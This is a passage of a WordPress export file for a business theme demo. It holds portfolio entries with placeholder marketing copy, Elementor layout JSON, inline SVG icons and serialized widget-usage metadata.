2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Business Planning</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/portfolio/business-planning/</link>
		<pubDate>Fri, 11 Sep 2020 04:38:39 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=802</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>OceanThemes</p>		
			<h6>Website:</h6>		
		<p>oceanthemes.net</p>		
			<h6>Date:</h6>		
		<p>June 25, 2019</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-1-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-1-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project-home3.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project-home3.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-home3-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>802</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 04:38:39]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 04:38:39]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[business-planning]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="business"><![CDATA[business]]></category>
		<category domain="portfolio_cat" nicename="startup"><![CDATA[startup]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[803]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"397902fd","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"26a3c89f","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"5d3639ae","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"4764c788","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"c953f5b","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"6976af58","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"532be286","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"1f8d8f2","elType":"widget","settings":{"editor":"<p>OceanThemes<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"f6bdc05","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"456060bf","elType":"widget","settings":{"editor":"<p>oceanthemes.net<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"1b23ea4e","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"3795aac6","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"7c34ff65","elType":"widget","settings":{"editor":"<p>June 25, 2019<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"426b0206","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"44248ebd","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"3832640c","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"b6a26ad","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"481b7621","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"d5ab828","elType":"section","settings":[],"elements":[{"id":"29e6c33","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"b054009","elType":"widget","settings":{"title":"<span style=\"color:#d92300\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"49ad33a","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"0e6c5fe","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#D92300","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"88fd839","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"4310f58","elType":"widget","settings":{"title":"<span style=\"color:#d92300\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"5d6f972","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"51cc929","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"cb47178","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"9614d81","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"0289b8b","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"91402e0","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"fc13dad","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"18a6a8e","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"c19a204","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"6b9e696","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"7dd471a","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"9e83811","elType":"widget","settings":{"title":"<span style=\"color:#d92300\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"9dbb82f","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"74aa36e","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"996950e","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #d92300;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"e8c32c0","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"5d69cc5","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project-home3.png","id":1691},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"47c953e","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Money Market</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/portfolio/money-market/</link>
		<pubDate>Fri, 11 Sep 2020 04:41:19 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=806</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>OceanThemes</p>		
			<h6>Website:</h6>		
		<p>oceanthemes.net</p>		
			<h6>Date:</h6>		
		<p>April 12, 2020</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-1-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-1-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
